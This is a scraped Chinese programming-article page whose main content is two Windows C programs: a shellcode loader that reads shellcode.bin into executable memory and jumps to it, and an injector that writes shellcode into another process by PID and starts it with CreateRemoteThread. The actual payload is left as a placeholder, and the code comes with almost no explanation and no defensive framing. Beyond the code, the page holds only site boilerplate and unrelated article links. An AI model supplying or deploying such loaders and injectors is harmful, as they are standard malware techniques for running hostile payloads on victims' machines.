生成二进制shellcode.bin文件,然后将其动态读入内存,并执行即可.
2021/9/12 7:07:16
本文主要是介绍生成二进制shellcode.bin文件,然后将其动态读入内存,并执行即可.,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
1 通过上方代码生成二进制shellcode.bin文件,然后将其动态读入内存,并执行即可.
2
3 #include <stdio.h>
4 #include <Windows.h>
5
6 int main(int argc, char * argv[])
7 {
8 HANDLE fp;
9 unsigned char * fBuffer;
10 DWORD fSize, dwSize;
11
12 fp = CreateFile(L"c://shellcode.bin", GENERIC_READ, FILE_SHARE_READ, NULL,
13 OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
14
15 fSize = GetFileSize(fp, 0);
16 fBuffer = (unsigned char *)VirtualAlloc(NULL, fSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
17 ReadFile(fp, fBuffer, fSize, &dwSize, 0);
18 CloseHandle(fp);
19
20 __asm
21 {
22 mov eax,fBuffer
23 push eax
24 ret
25 int 3
26 }
27 return 0;
28 }
29 ShellCode注入进程:
30
31 #include <stdio.h>
32 #include <windows.h>
33
34 unsigned char ShellCode[] = "shellcode代码";
35
36 BOOL InjectShellCode(int Pid)
37 {
38 HANDLE Handle, remoteThread;
39 PVOID remoteBuffer;
40
41 Handle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, Pid);
42
43 remoteBuffer = VirtualAllocEx(Handle, NULL, sizeof(ShellCode), (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
44 WriteProcessMemory(Handle, remoteBuffer, ShellCode, sizeof(ShellCode), NULL);
45 remoteThread = CreateRemoteThread(Handle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);
46 CloseHandle(Handle);
47 }
48
49
50 int main(int argc, char *argv[])
51 {
52 InjectShellCode(1024);
53 return 0;
54 }
这篇关于生成二进制shellcode.bin文件,然后将其动态读入内存,并执行即可.的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-06-29易优CMS安装常见问题汇总-icode9专业技术文章分享
- 2024-06-28易优新手必读安装教程-icode9专业技术文章分享
- 2024-06-28忘记eyoucms后台密码怎么办?-icode9专业技术文章分享
- 2024-06-26终极指南:Scrum中如何设置需求优先级
- 2024-06-26AI大模型企业应用实战(25)-为Langchain Agent添加记忆功能
- 2024-06-26小白家庭 nas 搭建方案-icode9专业技术文章分享
- 2024-06-23AI大模型企业应用实战(14)-langchain的Embedding
- 2024-06-23AI大模型企业应用实战(15)-langchain核心组件
- 2024-06-23AI大模型企业应用实战(16)-langchain核心组件
- 2024-06-23AI 大模型企业应用实战(06)-初识LangChain
